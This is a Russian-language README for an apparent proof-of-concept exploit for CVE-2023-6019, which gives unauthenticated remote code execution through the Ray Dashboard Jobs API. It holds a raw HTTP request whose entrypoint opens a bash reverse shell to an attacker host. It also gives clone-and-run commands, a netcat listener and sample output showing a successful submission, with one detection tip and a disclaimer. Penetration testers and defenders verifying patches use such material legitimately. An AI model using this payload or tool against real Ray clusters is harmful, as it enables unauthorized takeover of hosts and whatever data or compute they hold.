
PoC exploit для CVE-2023-6019 - удаленное выполнение кода через неаутентифицированный Ray Dashboard Jobs API.
PoC-эксплойт для CVE-2023-6019 — удаленное выполнение кода через неаутентифицированный API заданий Ray Dashboard.
Сделано oguiii
Anyscale Ray — это фреймворк с открытым исходным кодом для распределенных задач ML/AI. Версии до 2.6.4 предоставляют API для отправки заданий через Ray Dashboard (порт по умолчанию 8265) без какой-либо аутентификации, что позволяет неаутентифицированному атакующему отправлять произвольные задания и добиваться удаленного выполнения кода на хосте.
Конечная точка /api/jobs/ принимает JSON-полезную нагрузку с полем entrypoint, которое выполняется как команда оболочки процессом Ray worker — учетные данные не требуются.
POST /api/jobs/ HTTP/1.1
Host: <target>:8265
Content-Type: application/json
{
"entrypoint": "bash -c 'bash -i >& /dev/tcp/ATTACKER/PORT 0>&1'",
"runtime_env": {},
"job_id": null,
"metadata": {}
}
git clone https://github.com/joaquinrrr/CVE-2023-6019
cd CVE-2023-6019
pip install requests
python3 CVE-2023-6019.py -t <TARGET_IP> -p <PORT> -l <LHOST> -lp <LPORT>
# Запуск слушателя
nc -lvnp 4444
# Запуск эксплойта
python3 CVE-2023-6019.py -t 192.168.1.100 -p 8265 -l 192.168.1.10 -lp 4444
[*] Checking Ray version at 192.168.1.100:8265...
[*] Ray API version : 4
[*] Ray version : 2.6.3
[+] VULNERABLE! Ray 2.6.3 is affected by CVE-2023-6019
[*] Target : http://192.168.1.100:8265/api/jobs/
[*] Reverse shell : 192.168.1.10:4444
[*] Submitting job...
[+] Job submitted successfully!
[+] Job ID: raysubmit_Gztg89LZuTa8Jevc
[>] Make sure your listener is ready:
nc -lvnp 4444
Ищите неожиданные POST-запросы к /api/jobs/ на порту 8265 в журналах HTTP или сетевом трафике.
Этот инструмент предназначен только для авторизованного тестирования на проникновение и образовательных целей.
Автор не несет ответственности за любое неправомерное использование или ущерб, причиненный этим инструментом.
Всегда получайте соответствующее письменное разрешение перед тестированием.
| Флаг | Описание | По умолчанию |
|---|
-t | IP-адрес или имя хоста цели | обязательно |
-p | Порт Ray Dashboard | 8265 |
-l | IP-адрес атакующего (реверс-шелл) | обязательно |
-lp | Порт атакующего (реверс-шелл) | обязательно |